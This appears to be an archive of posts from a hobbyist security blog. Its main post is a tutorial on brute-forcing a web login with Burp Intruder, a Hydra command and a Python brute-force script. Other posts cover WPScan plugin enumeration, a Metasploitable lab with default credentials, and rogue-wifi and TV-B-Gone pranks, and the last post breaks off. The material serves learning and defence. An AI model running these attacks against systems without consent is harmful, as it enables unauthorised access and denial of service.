Online Brute Forcing 101

A close friend once mentioned how cool it would be to practice brute forcing against a website login, so I created a simple web page with a login form. An incorrect login displays a red error message; a successful login shows the rest of the page. There is no database or complex code behind it: the page hashes the submitted password and compares the hash to a stored value.

Before we continue, I must make it blatantly obvious that hacking any online service without consent could land you in a lot of trouble. For your safety, do not attack any systems outside of your own domain or online labs and tutorials that explicitly give consent. If you are reading this blog post, you have my consent to brute force greenjam94.me/login.php. To save time and limit the web traffic from brute forcing attempts, a username and a wordlist are provided.

There are a couple of tools that help with brute forcing an online form. The two I will demonstrate in this post are Burp Suite's Intruder module and Hydra. Both are available on Kali Linux.

Burp Suite

Burp Suite is an intercepting proxy from PortSwigger. My websites all use HTTPS and do not allow unencrypted traffic, so you will have to install and trust the PortSwigger CA certificate that the proxy generates before the browser will let Burp sit in the middle of the TLS connection.

Look closely at the image above. On the left-hand side you can see all the files being requested. There are links to this blog, some JavaScript from a CDN, and Bootstrap from another CDN. These can all be ignored. What we care about are the requests to greenjam94.me, in particular the login form and the passwords text file, which are both captured by the proxy. Every POST attempt to log in will be recorded; the image above shows one attempt.

Right click a POST request and click "Send to Intruder", or highlight it and press CTRL+I. This takes you to the Intruder module. Go to the Positions tab. We do not want to change the user value, so clear that payload position and leave only the password value marked. The page should look like the following.

Next go to the Payloads tab. Either paste the values in from the passwords text file or load the entire file if you saved a local copy. There should be 23 payloads, so 23 requests.

Click the "Start attack" button in the upper right corner. The attempts go by quickly, even in the free version of Burp Suite. The error messages are not signalled through HTTP status codes; every response is 200 (OK). Our saving grace is that a successful login returns more content, so its response is larger. Sort the results by the Length column and the one response that stands out is the hit.

Hydra

Hydra is a command line tool that can make quick work of many kinds of brute force attempts. However, the syntax can be a little confusing. Below is the command to brute force this form. You will have to save the passwords file locally before trying this.

hydra -I -l 'iAm' -P wordlist.txt www.greenjam94.me https-post-form "/login.php:name=^USER^&pswd=^PASS^:Incorrect password"

I will break down the options used above.

  • -l username value (a lowercase L)
  • -P password file; uppercase options are used for files with multiple values to attempt
  • www.greenjam94.me domain; the next requirement is the host to attack
  • https-post-form form type; this is the kind of service you are targeting, and the full list is in the man page
  • -I an option that tells Hydra to ignore an existing restore file instead of resuming a previous run
  • "1:2:3" form parameters separated by colons
    • 1 is the path after the domain, which always starts with a "/"
    • 2 is the form field names and values; ^USER^ and ^PASS^ mark where Hydra substitutes each guess
    • 3 is an expected error message; it does not have to be the complete message, and Hydra treats a response that does not contain it as a successful login (don't use colons unless escaped)
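Both tools rely on the same two tells: Hydra treats any response that lacks the error string as a hit, and Burp's Length column exposes the one response that carries the extra content. The script below is an added example, not code from this post, that applies both heuristics to a login form. To keep it runnable offline it also starts a tiny stand-in for greenjam94.me/login.php on localhost; the username, wordlist, stored hash and the `name`/`pswd` field names are constructed for the example, only the behaviour (always HTTP 200, short error page, longer success page) matches what the post describes.

```python
"""Added example (not the blog's own code): brute force a login form and
decide on success two ways, the Hydra way (error string absent) and the
Burp Intruder way (response length stands out).  A local stand-in for the
target login page makes the example run offline; the credentials and the
wordlist are constructed."""
import hashlib
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target. Like the post's page it stores a hash, not the password.
USER = "iAm"
SECRET_HASH = hashlib.sha256(b"correct horse").hexdigest()
ERROR_MARKER = "Incorrect password"
WORDLIST = ["password", "123456", "letmein", "correct horse", "qwerty"]


class LoginHandler(BaseHTTPRequestHandler):
    """Mimics the post's login page: always HTTP 200, red error text vs. a longer success page."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        name = form.get("name", [""])[0]
        pswd = form.get("pswd", [""])[0]
        if name == USER and hashlib.sha256(pswd.encode()).hexdigest() == SECRET_HASH:
            body = "<html><body><h1>Welcome back</h1><p>" + "secret content " * 20 + "</p></body></html>"
        else:
            body = f"<html><body><p style='color:red'>{ERROR_MARKER}</p></body></html>"
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_server():
    """Start the stand-in login page on a free localhost port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def try_login(base_url, user, password):
    """POST one guess the way Hydra's https-post-form module does; returns (status, body)."""
    data = urllib.parse.urlencode({"name": user, "pswd": password}).encode()
    req = urllib.request.Request(base_url + "/login.php", data=data, method="POST")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status, resp.read().decode()


def brute_force(base_url, user, wordlist, error_marker=ERROR_MARKER):
    """Try every password in the list and report the hit under both heuristics.

    by_marker: first response without the error string (Hydra's rule).
    by_length: the single largest response, or None if there is a tie (Burp's Length column).
    """
    sizes = {}
    by_marker = None
    for pw in wordlist:
        status, body = try_login(base_url, user, pw)
        sizes[pw] = len(body)
        if status == 200 and error_marker not in body and by_marker is None:
            by_marker = pw
    biggest = max(sizes.values())
    outliers = [pw for pw, n in sizes.items() if n == biggest]
    by_length = outliers[0] if len(outliers) == 1 else None
    return {"by_marker": by_marker, "by_length": by_length, "sizes": sizes}


if __name__ == "__main__":
    srv, url = start_server()
    try:
        print(brute_force(url, USER, WORDLIST))
    finally:
        srv.shutdown()
```

Against a real target, swap the base URL and field names for the ones Burp shows in the captured POST, and keep the wordlist small: the length heuristic only works when the error page is the same size every time, which is also why a site that pads or randomises its error response defeats it.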

Running this command you should see something like the following.

Feel free to try each method out once on your own on my login page! Please don’t do it repeatedly though, this is basically asking everyone to DOS me and I want to keep my websites up without pissing off my hosting company.

After finding the correct password, I suggest typing in the password manually and visiting the successful web page. Headphone alert, don’t use them. Speakers at high volume before submitting the form work best.

Know of any other good tools for online brute forcing? Let me know in a comment or on twitter. I hope you found this post to be helpful.

Volunteering at GrrCON 2017

GrrCON 2017, the seventh year and my third time attending. I volunteered again this year because it is a lot more involved than being a regular attendee. I’ve been to other conferences where volunteering burns you out. GrrCON is the only con where I could be in the middle of one job and ask “What more can I do to help?”.

The 2017 Difference

GrrCON hasn’t changed much since I have started coming to it. There are great speakers, supportive vendors, free beer, and even a tattoo artist. The organizers and volunteer staff do a great job putting on such a quality conference every year. If you haven’t been before, I strongly recommend going next year.

One big difference this year was the overwhelming amount of registrations. Apparently there were so many vendors and attendees signing up, registration had to be capped before we exceeded the amount of swag that was preordered. Attendees that got in later in the day had to use badges from previous years because we ran out.

Vendors were also placed in the hall outside of the tracks for speakers because the vendors area wasn’t big enough. While it was cool to see charities, local community groups, and school programs in a high traffic area, it still separated them from the vendors area.

All of the talks were recorded by IronGeek. He does a great job recording everyone that wants to be recorded and gets the videos posted online quickly. You need to go and checkout the list of videos from this conference, each of the speakers have good talks. The number of talks that I want to see are already in the dozens.

My Experience

Wednesday

Volunteers arrived a day early to get everything set up and swag bags ready for registration. It was a long day of preparing badges and unloading boxes but it flew by. There was a ton of people to help and it was great to catch up and see what people have been doing since last year. I forgot how fun it was to mess with Jen and the rest of the GrrCON family.

Wednesday night was the speaker dinner. People were always moving around to say hi or get another drink. I saw a lot of old friends that I haven’t seen in a while. It’s been said for a while that GrrCON is more of a family reunion than a security conference and this dinner made me truly believe that. I also picked up a set of Hak4Kidz badges that night. It’s a great group and I wanted to show my support.

One cool story I’ll share is that I was sitting with the guys from the IoT hacking village. They told me about the bluetooth badges, a pi zero that did half of a handshake with nearby devices. The badge tracked the overall number of bluetooth devices it could interact with. After a certain number of devices were identified, it also started playing with wifi networks. I wasn’t told more because it was a challenge for the village, but I was really interested in the project.

Thursday

Thursday morning started at 6 am. I was one of the first volunteers to show up and help set up registration. We carried all the swag bags to the front table and added a few gifts to some of the bags. My jobs for the rest of the day were to float around the vendor area in the morning and to help with the mi-go track in the afternoon.

Thursday night we partied at Z’s, I met up with some of #misec‘s finest and had a great time. The bar was doing karaoke and Lintile sang a tribute to #TrevorForget. After Z’s we got a drink at Founders before crashing for another early morning the next day.

Friday

Friday’s job was to help with the large speaker track and then play bouncer for the VIP area. While working the VIP area, I was able to have another volunteer tag in so I could go watch a friend give her first talk.

The day went by even faster than Thursday and it seemed like we were tearing down parts of the conference before the talks were even finished. After the con, I had a quick dinner with a few friends, said my goodbyes and left for home.

What is Next?

Next year’s GrrCON will be September 6 & 7! CFP and tickets will open in March. I believe that GrrCON ’18 will be in a larger part of DeVos place in order to accommodate the spike in attendance.

Hopefully I’ll get a speaker badge as well as a volunteer badge next year. It’s just an idea right now. I don’t want to give away too many spoilers, but we’ll find out in March!

The bluetooth badge also gave me an idea, however I have no clue where to start with it. I think it would be cool to get a scrolling LED strip on a hat to display messages like “Hello <bluetooth_device/wifi SSID/etc>!”. I’ll have to reach out to friends and see if that’s an easy project and if it’s actually do-able. Do you think it would be cool to walk around the conference with this?

Installing Kali and Metasploitable on VirtualBox

Have you ever wanted to be a 1337 hacker like you see in the movies? Metasploit automates some of the harder tasks in penetration testing. This blog post is a quick setup guide for two virtual machines that will let you explore how to use Metasploit.

Step 1: Get files needed to create the VMs

Step 2: Setup Kali

Open VirtualBox, click File > Import Appliance. Choose the kali.ova file that you downloaded from the link above. Click continue to review the VM settings. Hit import, none of the settings should require changing. The import will take a few minutes to complete depending on your machine.

If the VM fails to start after import, read the details of the failure. If it’s related to USB emulation then change the settings. Open the VM settings by right clicking the VM. Click settings. Find the ports tab and click USB. Change the emulation from 2.0 to 1.1 and everything will be good to go.

The default credentials are u: root / p: toor. To use Metasploit for the first time there is some setup required. In a terminal, start the PostgreSQL database by running service postgresql start. Initialize the Metasploit database by running msfdb init. Check that Metasploit works by running msfconsole.

Step 3: Setup Metasploitable2

We will need to create a Linux machine and use the virtual hard drive from the .zip archive that was downloaded earlier. The first step is to unzip the archive and find the Metasploitable.vmdk file.

Next go to VirtualBox and create a new Ubuntu (64-bit) machine. Name it whatever you will remember; I used Metasploitable2. Click continue once everything looks correct.

Change the memory size to at least 512 MB and click next. Then select "Use an existing virtual hard disk file" and pick the .vmdk file we found earlier. The last step is to click create.

Start the box and confirm everything is working as expected. The default credentials are msfadmin/msfadmin. Type ifconfig to see the box's IP address. This will come in handy when scanning for the machine from Kali. My machine is at 10.0.2.15.

Step 4: Double check networking

Metasploitable is intentionally vulnerable, so keep it off any network where someone else could reach it. Check the adapter type in the VM's VirtualBox network settings. Plain NAT blocks unsolicited inbound connections from the outside world, but it still lets the VM reach the internet, and by default each NAT-mode VM sits in its own private 10.0.2.0/24, so Kali and Metasploitable will not be able to see each other. Put both VMs on the same NAT Network, Host-only adapter, or Internal Network instead. Host-only and Internal Network also cut off internet access entirely, which is the safest choice for a deliberately vulnerable box.

Host-only also works if you install Metasploit on your base host and skip the Kali VM, because the host itself is on the host-only network.

Step 5: Attack

Now play around with Metasploit! Get on Kali and ping the Metasploitable2 machine to make sure it is reachable. Run msfconsole for a CLI interface or open armitage for a GUI. A lot of walkthroughs are online and make a good place to start playing with Metasploit.

More info

For more information on how to use Metasploit, check out Offensive Security’s free course. Look for some articles such as the series from null-byte. Read a book about it, buy now from No Starch Press. My motive for posting this is a lightning talk I gave at #misec this month. The IntroToMSF slides are hosted here for those who are interested.

PHP Regex tutorial

Have you ever wondered how web applications validate forms? How does the app know whether your input is really an email address? In most PHP applications this is done with regular expressions (regex).

I have previously posted about how to defend against XSS and SQL injection. Checking strings against an allow list of permitted characters, rather than trying to block the dangerous ones, is one of the easiest changes a developer can make, and regex makes this easy in most programming languages.
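As an added example, not code from this post or from the tutorial linked below, here is allow-list validation for two form fields, written with Python's re module. PHP's preg_match() uses the same PCRE-style syntax, so the patterns carry over unchanged. It also shows the anchoring trap that bites in both languages: `$` also matches just before a trailing newline, so "alice\n" slips past a `^...$` pattern. Python's `\Z` (PCRE's `\z`) anchors at the true end of input. The sample inputs are constructed.

```python
"""Added example (not from the blog or the linked tutorial): allow-list form
validation with regular expressions, plus the '$' anchoring pitfall.
Patterns are PCRE-compatible; the inputs are constructed."""
import re

# Allow list: say exactly which characters may appear, instead of blacklisting
# <, ', ; and whatever else an attacker thinks of next.
USERNAME_RE = re.compile(r"\A[A-Za-z0-9_]{3,32}\Z")

# A deliberately simple e-mail shape: local part, one @, dotted domain, alphabetic TLD.
# Good enough to reject garbage on a form; actually delivering mail is the only real test.
EMAIL_RE = re.compile(r"\A[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}\Z")

# The trap: in Python and in PCRE (without PHP's D modifier) '$' also matches
# right before a final newline, so the newline reaches the application.
LOOSE_USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")


def is_valid_username(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None


def is_valid_email(value: str) -> bool:
    return EMAIL_RE.fullmatch(value) is not None


def loose_username_check(value: str) -> bool:
    """The ^...$ version, kept only to demonstrate why the anchor choice matters."""
    return LOOSE_USERNAME_RE.search(value) is not None


def validate_form(fields: dict) -> list:
    """Validate a submitted form; returns the names of the fields that failed."""
    checks = {"name": is_valid_username, "email": is_valid_email}
    return [f for f, check in checks.items() if not check(fields.get(f, ""))]


if __name__ == "__main__":
    print(validate_form({"name": "alice_01", "email": "alice@example.com"}))  # []
    print(validate_form({"name": "<script>", "email": "alice@example"}))      # ['name', 'email']
    print(loose_username_check("alice\n"), is_valid_username("alice\n"))     # True False
```

Validation like this is a filter on shape, not a substitute for output encoding or parameterised queries: a value that passes the allow list is still data and still has to be escaped for wherever it ends up.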

In that post I linked to RegexOne. The site has a pretty good cheat sheet covering how regex is useful, but it is only really helpful if you are already familiar with how regex works.

If you are looking for a more complete tutorial, try this one. Guru99 reached out to me to promote their new tutorial: PHP Regular Expressions Tutorial: Preg_match, Preg_split, Preg_replace. It looks like a pretty comprehensive tutorial, and I suggest starting there to learn the basics behind regex.

Do not waste your time with HPKP

This is my last post related to HTTP Public Key Pinning (HPKP). It is a response to Scott Helme's latest post about giving up on HPKP, and to how my blog is a perfect example of his concerns.

In the past I’ve written three articles about the HPKP header:

The point of each of these articles is pretty well summed up in its title. For work, I was tasked with learning about HPKP, and of course I made blog posts as I tried out the new header.

Starting with HPKP

While learning about HPKP, Helme’s posts were a great resource for me. Thanks to him, I was able to understand the process well enough to get some tests up online using this domain.

Everything worked fine until my Let's Encrypt certificate came up for renewal. certbot generates a new key pair on renewal by default, so the renewed certificate's public key no longer matched the pin I had published, and every visitor using a browser that supported HPKP was locked out of the blog for as long as the cached max-age lasted.

Running into issues

In Helme's post, my failure is an example of the "bad hygiene" he warns against. HPKP only works if certificate renewal and the published pins are managed together: every key that will ever be served must be pinned before it is deployed, with at least one backup key held offline. Letting Let's Encrypt's certbot auto-renew the certificate without tracking which keys the pins referred to meant I could not support the header properly.

In order to "resolve" the issue, I had to strip the header from my site and ask affected readers to clear the pin their browser had cached for my domain.
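The mechanics behind that lockout are simple enough to show in a few lines. The block below is an added example, not code from this post or from Helme's: it computes an HPKP pin the way RFC 7469 defines it, base64 of the SHA-256 of the DER-encoded SubjectPublicKeyInfo, builds the header, and replays the renewal with and without a backup pin. The three "keys" are constructed Ed25519 SPKI blobs (the real 12-byte DER prefix followed by placeholder key bytes), not keys from any real site.

```python
"""Added example (not the blog's own code): RFC 7469 pin computation and the
renewal scenario that locked readers out of this blog.  Keys are constructed
SPKI blobs with placeholder key bytes, not real keys."""
import base64
import hashlib

# DER prefix of an Ed25519 SubjectPublicKeyInfo: SEQUENCE { AlgorithmIdentifier(1.3.101.112), BIT STRING }.
ED25519_SPKI_PREFIX = bytes.fromhex("302a300506032b6570032100")
KEY_2017 = ED25519_SPKI_PREFIX + bytes(range(32))         # placeholder: the key in use when the pin was published
KEY_BACKUP = ED25519_SPKI_PREFIX + bytes(range(32, 64))   # placeholder: backup key kept offline
KEY_RENEWED = ED25519_SPKI_PREFIX + bytes(range(64, 96))  # placeholder: fresh key certbot generates on renewal

# Equivalent shell recipe for a real certificate (not run here):
#   openssl x509 -in cert.pem -pubkey -noout | openssl pkey -pubin -outform der \
#     | openssl dgst -sha256 -binary | base64


def spki_pin(spki_der: bytes) -> str:
    """RFC 7469 pin value: 'sha256/' + base64(SHA-256(DER SubjectPublicKeyInfo))."""
    return "sha256/" + base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def hpkp_header(spki_ders, max_age: int) -> str:
    """Build a Public-Key-Pins header. The RFC requires a backup pin, so at least two keys."""
    if len(spki_ders) < 2:
        raise ValueError("HPKP needs a backup pin for a key that is not in the served chain")
    parts = []
    for der in spki_ders:
        algo, value = spki_pin(der).split("/", 1)
        parts.append(f'pin-{algo}="{value}"')
    return "Public-Key-Pins: " + "; ".join(parts) + f"; max-age={max_age}"


def browser_accepts(pinned_spkis, served_chain_spkis) -> bool:
    """A client that cached pins connects only if some pin matches a key in the served chain."""
    pinned = {spki_pin(k) for k in pinned_spkis}
    return any(spki_pin(k) in pinned for k in served_chain_spkis)


def renewal_scenarios() -> dict:
    """Replay the post: pins cached by a browser, then a renewal that swaps the key."""
    pinned_no_usable_backup = [KEY_2017]              # what an unmanaged auto-renew setup amounts to
    pinned_with_backup = [KEY_2017, KEY_BACKUP]       # live key plus an offline backup
    return {
        "before_renewal": browser_accepts(pinned_no_usable_backup, [KEY_2017]),
        "after_renewal_new_key": browser_accepts(pinned_no_usable_backup, [KEY_RENEWED]),
        "after_renewal_reused_key": browser_accepts(pinned_no_usable_backup, [KEY_2017]),
        "after_renewal_rotated_to_backup": browser_accepts(pinned_with_backup, [KEY_BACKUP]),
    }


if __name__ == "__main__":
    print(hpkp_header([KEY_2017, KEY_BACKUP], max_age=5184000))
    for name, ok in renewal_scenarios().items():
        print(f"{name}: {'connects' if ok else 'LOCKED OUT'}")
```

The two recoverable cases are the ones a pinning deployment has to plan for in advance: either renew with the same key pair (certbot's --reuse-key) or rotate to a key that was already pinned as the backup. Anything else leaves every browser holding the old pin locked out until max-age expires.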

Conclusion

It is at this point that I agree with Helme's conclusion that "One of the biggest concerns I have with HPKP right now is sites trying to use it and getting it wrong", especially since my blog is one of the sites that proves how easy it is to get wrong. Because of this difficulty, and the massive impact a bad certificate/pin combination has on end users, I agree that HPKP is not worth implementing.

Please go and read Helme’s post if HPKP is something you deal with or if you’re starting to look into it as well!

TV B GONE

Ever sit at a bar with friends and try to have a conversation but the TVs behind the bar were too loud? If only there was a quick convenient way to turn them all off at once. This is where the TV B GONE remote comes in. A simple kit that sends over 100 “power off” signals to TVs within a 150 foot range at the push of a button.

The noisy bar situation has happened to me many times at security conferences. At the very least, the conversation that follows would be quite interesting. The kit requires some soldering, but the instructions from Adafruit are very clear and easy to read.

TV B GONE looks cool by itself. The exposed circuit board has a certain appeal. In order to give it some protection and provide a better grip, there’s a case that can be 3d printed. The design is hosted on Thingiverse. If you’re looking to do the same, don’t cut the wires to the battery holder when building the kit, the remote case is thinner and puts the holder next to the board instead of back to back.

Printing the case

The case printed very well. The designs are positioned so that only a small surface area touches the build plate. In order to get a clean print, I had to rotate some of the parts 90 degrees. There were 4 parts included. Total print time was still under 4 hours. After printing, I sanded and painted the case. If I were to do it again, I would spend more time sanding and try to be more aware of any "low spots". The paint did not cover some small blemishes as well as I expected.

After 3D printing the case, I followed the instructions linked above to solder the kit together. While soldering, I was too focused to take pictures of the process. The final assembly was also pretty easy. I used super glue to stick the battery holder to the front of the case and attach the back of the case.

Usage

So far I’ve been able to turn off every TV in my house. I’ve even been able to turn off multiple TVs when they’re in range. I look forward to bringing it to future security conferences and using it as a talking point.

I recommend anyone who wants a soldering project to attempt this build. It didn’t take long and the only required tools are AA batteries, a soldering iron, and wire clippers.

Breaking My Blog with WPscan

One of the tools offered by default in Kali and many other hacking-related distros is WPScan, a black box WordPress vulnerability scanner. I wanted to learn how to use this tool because it helps with recon on CTF challenges and practice boxes from VulnHub, and with trying to keep my own blog vulnerability free.

Disclaimer

Before I tell you more about the tool and how it can be used, I have to throw out the usual disclaimer. Do not use this tool on any WordPress site you do not own or have permission to scan. I ran WPScan on my own blog and brought the whole site to its knees. If you did that to a professional blog or your company's blog, you could have major problems when you get caught.

Setup

If you don’t have a personal WordPress instance to test, then look at getting OWASP’s Broken Web App installed. It has a vulnerable instance of WordPress included that you can scan against and even try to harden. When things break, just reinstall the VM and start over from scratch.

I have a Kali VM installed on most of my computers. Open a terminal and type wpscan -h to learn about all of the options for scanning a WordPress instance. If you want to skip the "bells and whistles", just run wpscan --url <target> --enumerate p to scan and try to find vulnerable plugins.

The scan and the results

WPScan crawls the site looking for version numbers and other exposed information that can be compared against its database of known vulnerabilities. Running the scan against my site, it found one vulnerability. There was also a smaller issue: the WordPress version was public. I was able to research the vulnerability using the links in the scan output. While the "fix" is not a perfect patch, it is better than ignoring the vulnerability until the next WordPress update is ready. The version disclosure was easy enough to remove by deleting the stock readme.html file.

The vulnerability finding did not go away on the next scan. That is expected: the scanner is a quick way to find likely vulnerabilities from version numbers and other information exposed by the site. It has no proof-of-concept exploits and makes no attempt to validate whether a finding is a false positive, so a mitigated-but-unpatched install still reports as vulnerable.

Unexpected fun with WPScan

With the --enumerate p option the scanner brute forces the site with requests for every plugin it knows about, in order to discover which are installed. This crippled my site: over 20 simultaneous database connections made it unresponsive. That was not solely the scanner's fault, but a consequence of my having created this blog in college, which means I took the cheap and easy route: Digital Ocean's one-click WordPress image on the smallest droplet.
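That burst of plugin requests is also what a scan looks like from the server side, and it is easy to pick out of an access log. The detector below is an added example, not code from this post: it parses Apache combined-format log lines, counts the distinct /wp-content/plugins/<name>/ paths each client hits inside a sliding window, and separately flags fetches of readme.html, the file that leaked my WordPress version. The log lines are constructed for the example and the window and threshold are assumptions to tune for your own traffic.

```python
"""Added example (not the blog's own code): flag WPScan-style plugin
enumeration and readme.html version probing in an access log.  Log lines
are constructed; window and threshold are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
PLUGIN_RE = re.compile(r"^/wp-content/plugins/([^/?]+)/")

# Constructed sample: one scanner (203.0.113.7) and one ordinary reader (198.51.100.5).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2017:21:14:01 +0000] "GET /readme.html HTTP/1.1" 200 7278
203.0.113.7 - - [10/Aug/2017:21:14:02 +0000] "GET /wp-content/plugins/akismet/ HTTP/1.1" 403 199
203.0.113.7 - - [10/Aug/2017:21:14:02 +0000] "GET /wp-content/plugins/jetpack/ HTTP/1.1" 404 210
203.0.113.7 - - [10/Aug/2017:21:14:02 +0000] "GET /wp-content/plugins/wordfence/ HTTP/1.1" 404 210
203.0.113.7 - - [10/Aug/2017:21:14:03 +0000] "GET /wp-content/plugins/yoast-seo/ HTTP/1.1" 404 210
203.0.113.7 - - [10/Aug/2017:21:14:03 +0000] "GET /wp-content/plugins/contact-form-7/ HTTP/1.1" 404 210
203.0.113.7 - - [10/Aug/2017:21:14:03 +0000] "GET /wp-content/plugins/wp-super-cache/ HTTP/1.1" 404 210
198.51.100.5 - - [10/Aug/2017:21:14:05 +0000] "GET /2017/08/breaking-my-blog-with-wpscan/ HTTP/1.1" 200 18211
198.51.100.5 - - [10/Aug/2017:21:14:06 +0000] "GET /wp-content/plugins/akismet/css/form.css HTTP/1.1" 200 1331
198.51.100.5 - - [10/Aug/2017:23:40:06 +0000] "GET /wp-content/plugins/jetpack/css/jetpack.css HTTP/1.1" 200 4512
"""


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(log_text: str, window_seconds: int = 60, plugin_threshold: int = 5) -> dict:
    """Return {ip: [findings]} for clients whose traffic looks like a plugin enumeration."""
    findings = defaultdict(list)
    recent = defaultdict(deque)   # ip -> (timestamp, plugin slug) pairs inside the window
    flagged_enum = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path = rec["ip"], rec["ts"], rec["path"]
        if path == "/readme.html":
            findings[ip].append("version disclosure: readme.html fetched")
        m = PLUGIN_RE.match(path)
        if not m:
            continue
        q = recent[ip]
        q.append((ts, m.group(1)))
        while (ts - q[0][0]).total_seconds() > window_seconds:   # slide the window forward
            q.popleft()
        distinct = {slug for _, slug in q}
        # A normal page load touches a handful of plugins' assets; a scan touches dozens
        # of plugin directories that mostly do not exist (403/404), all within seconds.
        if len(distinct) >= plugin_threshold and ip not in flagged_enum:
            flagged_enum.add(ip)
            findings[ip].append(f"plugin enumeration: {len(distinct)} distinct plugin paths in {window_seconds}s")
    return dict(findings)


if __name__ == "__main__":
    for ip, notes in detect(SAMPLE_LOG).items():
        print(ip, notes)
```

The ordinary reader also requests plugin paths, because themes load plugin CSS and JavaScript, but only a couple of them and hours apart, so the window keeps them below the threshold. Feed the same function a real log and the scanner stands out as the one client walking plugin directories that return 403 or 404.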

The reason I am not afraid to tell all you hackers about this is that I was able to resolve the issue with some help from friends at #misec. They told me about adding a swapfile to give my little VM some headroom. Since then I have been able to run WPScan multiple times without a single fatal performance issue.

Edit: A swapfile is NOT a recommended defence against a DoS caused by scans or a spike in traffic. It is a quick fix and a cheap band-aid. If your company uses WordPress, or you have a personal blog that is getting a lot of traffic, upgrade the VM or migrate to a server that can handle the load. This was pointed out to me when I first heard of using a swapfile and again on Twitter after posting this.


Converge 2017

May 11-12th was the Converge conference. If you’re in Michigan and are curious about information security, then I suggest you look at attending next year. For those that missed this year, Irongeek recorded all the talks and posted them online for you! Watch some of the talks and then put an alert on your phone to buy tickets for next year.

Converge is a great conference. I will admit I am partial because it is in my backyard. However, that is not the only reason I like it. The talks cover great content, the speakers are friendly, and it is not so big that guests feel lost in a sea of other attendees.

Volunteering

On Thursday, I spent the morning volunteering with Irongeek recording talks for track 2. Helping with A/V is great because I get to volunteer and watch talks with a front row seat. In the afternoon I networked with people in the halls, after all that’s the most important part of a conference, right?

Friday was a lot of fun. I started off by playing with a new toy: a Nexus phone loaded with Kali NetHunter. I am still exploring the tools on it, but one of them is the MANA wireless toolkit, which lets me broadcast a wireless network. This makes for excellent trolling, especially for those who get the inside joke. There was some evidence at GrrCON a few years ago.

I know at least one person noticed because they had a screenshot for me to share!

Learning how to pen test

The rest of the day, I was in training for web application pen testing. Kevin Johnson from SecureIdeas offered a 1 day version of his week long training course. We went over a lot of great topics, like his recommended methodology and the tools that pen testers can use.

While the training was amazing, it is still something that Kevin offers to others, so I do not want to spill too many secrets. If you are interested, I do suggest that you take a look at his site, secureideas.com.

I’ve said it before on these blog posts and I’ll say it again. Conferences are a great center for networking, learning, and growing if you’re looking at getting into the information security industry. Hopefully my stories from this year’s Converge has convinced you to attend the next conference in your area!

Building a community

At the #misec meeting I attended in mid April there was a panel on building an infosec community, so I am borrowing their title for a post and giving my two cents in order to spread the topic!

I won’t give a huge synopsis of who said what like I did in my last post about a #misec panel. Instead, please watch #misec’s video on youtube if you’re interested in what was shared.

Community?

There were two general categories of discussion at the panel; meetups like #misec or BurbSec, and conferences like Converge or Thotcon. Your community is probably a collection of both. For instance, #misec was born from Bsides Detroit members who wanted more and created monthly meetings to have a smaller (more frequent) version of a Bsides conference. Two aspects are required to start or build a community; networking and attendance.

In order to have a community, people need to attend and contribute. In order for people to know where to show up, there needs to be some kind of networking and outreach. “Grabbing people” is a good way to start a meetup. Find people at a conference, ask around, and tweet to see what the interest is. Welcome everyone and follow up with people and the rest will fall into place. A conference works in the same way as there is a dependency on people. Volunteering, speaking, and attending is the core of networking.

Why me?

Meeting people and networking is a two way street. You get chances to volunteer at conferences, speak out about your interests and get feedback from others in the industry, and there are usually job offers and professional networking involved as well. Even if you’re an introvert and it’s stressful, making a name for yourself and showing people what you’re made of is huge in this industry and there’s a lot of great connections to be made through these communities.

Be involved. It keeps you busy. There are many ways to grow, whether through volunteering at a conference or stumbling through your first talk at a meeting. Being able to inspire others and help them grow is also an awesome part of being in an infosec community. A community is nothing without people, and you are one of those people.

Summary

To keep it short and sweet, try to use the following checklist:

  1. Go to conferences
    • Volunteer if it’s too expensive
    • Volunteer if it’s local and you want to contribute
    • Respond to the CFP or call for papers if you have something fun to share
  2. Join twitter and ask for help
  3. Find the closest city meeting and go
    • Start your own if the closest isn’t close enough
  4. Wash, rinse, and repeat

My experience setting up an Algo VPN

First off, I don’t know if you’ve been avoiding the political storm as much as I have but there’s one thing that’s been so retweeted, shared, and updated that I couldn’t avoid it. The discussion about the privacy of our internet content.

The Problem

ISPs are able to sell your data. While it is possible that similar data is already being collected and used by social media, applications, and other providers, it has brought up an interesting conversation about how to secure ourselves while browsing the internet.

Using TLS to encrypt the communication between a client and a server is a good way to protect the content between you and a website. However, what about your destination, IP address, and the other metadata that is required to connect to that server? Virtual private networks (VPNs) have been used by corporations and security-focused individuals for years. Lately VPNs are the center of attention because they tunnel all of your traffic through an encrypted connection to the VPN server: your ISP or the coffee shop's wifi sees only encrypted traffic to that server, and the websites you visit see the VPN server's IP address rather than yours. To learn more about what a VPN is, check out https://www.bestvpn.com/blog/38176/vpns-beginners-need-know/.

A Solution

